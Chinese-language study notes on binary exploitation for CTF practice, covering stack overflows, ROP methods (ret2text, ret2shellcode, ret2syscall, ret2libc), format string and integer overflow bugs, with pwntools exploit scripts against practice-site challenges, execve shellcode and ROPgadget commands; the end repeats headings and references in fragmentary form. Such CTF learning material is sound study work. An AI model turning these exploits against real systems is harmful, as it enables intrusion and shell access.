二进制漏洞学习笔记 - PWN篇<\/h1>

栈溢出漏洞<\/h2>

原理<\/h3>
栈是一种后进先出的数据结构。在调用函数时，会伴随函数栈帧的开辟和还原（平栈）。栈空间从高地址向低地址增长。当函数中使用数组作为局部变量时，数组赋值方向是从低地址到高地址，与栈增长方向相反。如果未限制数组赋值边界，可能造成栈溢出漏洞。<\/p>
常见易导致栈溢出的函数：scanf, gets, strcpy, strcat, sprintf等。<\/p>

ROP技术<\/h3>

ROP(Return-oriented programming)是指面向返回编程。在32位系统中，ret相当于pop EIP，将栈顶数据赋值给EIP并从栈弹出。由于NX保护阻止直接执行栈上的shellcode，可以通过ROP技术在可执行段中执行shellcode。<\/p>

初级ROP技术包括：<\/p>

ret2text<\/li>
ret2shellcode<\/li>
ret2syscall<\/li>

ret2libc<\/li> <\/ol>

ret2text<\/h4>

返回到代码段执行已有代码。例如程序中已有system("\/bin\/sh")<\/code>或system("cat flag")<\/code>时，只需将这些调用地址覆盖到返回地址处。<\/p>

示例（攻防世界level0）：<\/p>

from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>r =<\/span> remote("111.200.241.244"<\/span>, 57216<\/span>)
<\/span><\/span>payload =<\/span> 'A'<\/span>*<\/span>136<\/span> +<\/span> p64(0x00400596<\/span>)
<\/span><\/span>r.<\/span>sendlineafter("Hello, World<\/span>\n<\/span>"<\/span>, payload)
<\/span><\/span>r.<\/span>interactive()
<\/span><\/span><\/code><\/pre>ret2shellcode<\/h4>
在没有NX保护时，可以直接将返回地址覆盖为shellcode地址。shellcode通常调用sys_execve<\/code>执行\/bin\/sh<\/code>。<\/p>
示例：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>context(arch=<\/span>"amd64"<\/span>, os=<\/span>"linux"<\/span>, log_level=<\/span>"debug"<\/span>)
<\/span><\/span>p =<\/span> process(".\/ret2shellcode"<\/span>)
<\/span><\/span>elf =<\/span> ELF(".\/ret2shellcode"<\/span>)
<\/span><\/span>jmp_esp =<\/span> elf.<\/span>search(asm('jmp rsp'<\/span>)).<\/span>next()
<\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span>payload =<\/span> "A"<\/span>*<\/span>0xd8<\/span> +<\/span> p64(jmp_esp) +<\/span> shellcode
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>ret2syscall<\/h4>
当开启NX保护时，可以使用ret2syscall方法，通过收集带有ret指令的gadgets拼接成所需shellcode。<\/p>
32位调用execve("\/bin\/sh",NULL,NULL)<\/code>的shellcode：<\/p>
push<\/span> 0x68<\/span>
<\/span><\/span>push<\/span> 0x732f2f2f<\/span>
<\/span><\/span>push<\/span> 0x6e69622f<\/span>
<\/span><\/span>mov<\/span> ebx<\/span>, esp<\/span>
<\/span><\/span>xor<\/span> ecx<\/span>, ecx<\/span>
<\/span><\/span>xor<\/span> edx<\/span>, edx<\/span>
<\/span><\/span>push<\/span> 11<\/span>
<\/span><\/span>pop<\/span> eax<\/span>
<\/span><\/span>int<\/span> 0x80<\/span>
<\/span><\/span><\/code><\/pre>使用ROPgadget查找对应gadgets：<\/p>
ROPgadget --binary .\/ret2syscall --string \/bin\/sh
<\/span><\/span>ROPgadget --binary .\/ret2syscall --only "pop|pop|pop|ret"<\/span> | grep "edx"<\/span> | grep "ebx"<\/span> | grep "ecx"<\/span>
<\/span><\/span>ROPgadget --binary .\/ret2syscall --only "pop|ret"<\/span> | grep eax
<\/span><\/span>ROPgadget --binary .\/ret2syscall --only "int"<\/span> | grep "0x80"<\/span>
<\/span><\/span><\/code><\/pre>示例EXP：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>p =<\/span> process(".\/ret2syscall"<\/span>)
<\/span><\/span>pop_eax =<\/span> p32(0x080bb196<\/span>)
<\/span><\/span>pop_edx_ecx_ebx =<\/span> p32(0x0806eb90<\/span>)
<\/span><\/span>bin_sh =<\/span> p32(0x080be408<\/span>)
<\/span><\/span>int_0x80 =<\/span> p32(0x08049421<\/span>)
<\/span><\/span>offset =<\/span> 112<\/span>
<\/span><\/span>payload =<\/span> flat(['a'<\/span>*<\/span>offset, pop_eax, 0xb<\/span>, pop_edx_ecx_ebx, 0<\/span>, 0<\/span>, bin_sh, int_0x80])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>ret2libc<\/h4>
当程序没有后门、开启NX保护且没有足够gadgets时，可以使用ret2libc技术。通过泄露libc函数地址，计算libc基址，进而调用libc中的函数。<\/p>
获取libc基址方法：从程序GOT表获取函数实时地址，减去libc中函数偏移。<\/p>
示例（攻防世界pwn-100）：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> LibcSearcher import<\/span> *<\/span>
<\/span><\/span>p =<\/span> remote("111.200.241.244"<\/span>, "64745"<\/span>)
<\/span><\/span>elf =<\/span> ELF('\/mnt\/hgfs\/pwn-100'<\/span>)
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>addr_pop_rdi =<\/span> 0x400763<\/span>
<\/span><\/span>addr_main =<\/span> 0x4006B8<\/span>
<\/span><\/span>
<\/span><\/span># 第一次泄露read的got地址<\/span>
<\/span><\/span>payload =<\/span> 'A'<\/span>*<\/span>72<\/span> +<\/span> p64(addr_pop_rdi) +<\/span> p64(elf.<\/span>got['read'<\/span>]) +<\/span> p64(elf.<\/span>symbols['puts'<\/span>]) +<\/span> p64(addr_main) +<\/span> 'A'<\/span>*<\/span>96<\/span>
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>p.<\/span>recvuntil('<\/span>\x0a<\/span>'<\/span>)
<\/span><\/span>addr_read =<\/span> p.<\/span>recv()[:-<\/span>1<\/span>]
<\/span><\/span>addr_read =<\/span> u64(addr_read.<\/span>ljust(8<\/span>, '<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>
<\/span><\/span># 获取libc版本并计算system地址<\/span>
<\/span><\/span>libc =<\/span> LibcSearcher('read'<\/span>, addr_read)
<\/span><\/span>addr_base =<\/span> addr_read -<\/span> libc.<\/span>dump('read'<\/span>)
<\/span><\/span>addr_sys =<\/span> addr_base +<\/span> libc.<\/span>dump('system'<\/span>)
<\/span><\/span>addr_sh =<\/span> addr_base +<\/span> libc.<\/span>dump('str_bin_sh'<\/span>)
<\/span><\/span>
<\/span><\/span># 第二次利用<\/span>
<\/span><\/span>payload =<\/span> 'A'<\/span>*<\/span>72<\/span> +<\/span> p64(addr_pop_rdi) +<\/span> p64(addr_sh) +<\/span> p64(addr_sys) +<\/span> p64(addr_main) +<\/span> 'A'<\/span>*<\/span>96<\/span>
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>格式化字符串漏洞<\/h2>
原理<\/h3>
格式化字符串函数如printf、fprintf、sprintf等，当直接使用用户输入作为格式化字符串时，可能导致信息泄露或内存修改。<\/p>
利用1：泄露信息<\/h3>
通过构造特定格式化字符串可以泄露栈上信息，如%x%x%x%x%x%x<\/code>可以获取栈数据。<\/p>
示例（攻防世界Mary_Morton）：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>p =<\/span> remote("111.200.241.244"<\/span>, 51032<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("3. Exit the battle"<\/span>, '2'<\/span>)
<\/span><\/span>payload1 =<\/span> '%23$p'<\/span>
<\/span><\/span>p.<\/span>sendline(payload1)
<\/span><\/span>p.<\/span>recvuntil('0x'<\/span>)
<\/span><\/span>canary =<\/span> int(p.<\/span>recv()[:16<\/span>], 16<\/span>)
<\/span><\/span>print "output: "<\/span> +<\/span> str(canary)
<\/span><\/span>
<\/span><\/span>canary_offset =<\/span> 0x88<\/span>
<\/span><\/span>ret_offset =<\/span> 0x98<\/span>
<\/span><\/span>get_flag_fun =<\/span> 0x00000000004008DA<\/span>
<\/span><\/span>payload2 =<\/span> canary_offset*<\/span>'a'<\/span> +<\/span> p64(canary) +<\/span> (ret_offset -<\/span> canary_offset -<\/span> 8<\/span>)*<\/span>'a'<\/span> +<\/span> p64(get_flag_fun)
<\/span><\/span>p.<\/span>sendlineafter("3. Exit the battle"<\/span>, "1"<\/span>)
<\/span><\/span>p.<\/span>sendline(payload2)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>利用2：修改内存<\/h3>
通过格式化字符串可以修改指定内存地址的值。<\/p>
示例（攻防世界实时数据检测）：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>p =<\/span> remote("111.200.241.244"<\/span>, 48715<\/span>)
<\/span><\/span>key_addr =<\/span> 0x0804A048<\/span>
<\/span><\/span>payload =<\/span> '<\/span>%35795746x<\/span>%16$n<\/span>\x00<\/span>'<\/span> +<\/span> p32(0x0804A048<\/span>)
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>整数溢出漏洞<\/h2>
原理<\/h3>
整数溢出发生在算术运算试图创建超出可用位数表示范围的数值时。分为：<\/p>

有符号整数溢出<\/li>
无符号整数回绕<\/li>
截断（不当类型转换）<\/li>
<\/ol>
利用<\/h3>
示例（攻防世界int_overflow）：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>p =<\/span> remote('111.200.241.244'<\/span>, 52212<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("choice:"<\/span>, '1'<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("username:"<\/span>, "bbb"<\/span>)
<\/span><\/span>system_addr =<\/span> 0x8048699<\/span>
<\/span><\/span>cat_flag =<\/span> 0x08048960<\/span>
<\/span><\/span>payload =<\/span> 'a'<\/span>*<\/span>24<\/span> +<\/span> p32(system_addr) +<\/span> p32(cat_flag) +<\/span> p32(0xbbbbbbbb<\/span>) +<\/span> 'a'<\/span>*<\/span>(0x104<\/span> -<\/span> 24<\/span> -<\/span> 4<\/span>*<\/span>2<\/span>)
<\/span><\/span>p.<\/span>sendlineafter("passwd:"<\/span>, payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>参考资料<\/h2>

《CTF竞赛权威指南》, 杨超<\/li>
看雪课程:《零基础入门pwn》<\/li>
https:\/\/github.com\/ctf-wiki<\/li>
https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/environment\/<\/li>
https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf<\/li>
<\/ol>

二进制漏洞学习笔记 - PWN篇<\/h1>

栈溢出漏洞<\/h2>

格式化字符串漏洞<\/h2>

原理<\/h3> 格式化字符串函数如printf、fprintf、sprintf等，当直接使用用户输入作为格式化字符串时，可能导致信息泄露或内存修改。<\/p>

整数溢出漏洞<\/h2>

参考资料<\/h2> 《CTF竞赛权威指南》, 杨超<\/li> 看雪课程:《零基础入门pwn》<\/li> https:\/\/github.com\/ctf-wiki<\/li> https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/environment\/<\/li> https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf<\/li> <\/ol>

原理<\/h3>
格式化字符串函数如printf、fprintf、sprintf等，当直接使用用户输入作为格式化字符串时，可能导致信息泄露或内存修改。<\/p>

参考资料<\/h2>

《CTF竞赛权威指南》, 杨超<\/li>
看雪课程:《零基础入门pwn》<\/li>
https:\/\/github.com\/ctf-wiki<\/li>
https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/environment\/<\/li>
https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf<\/li> <\/ol>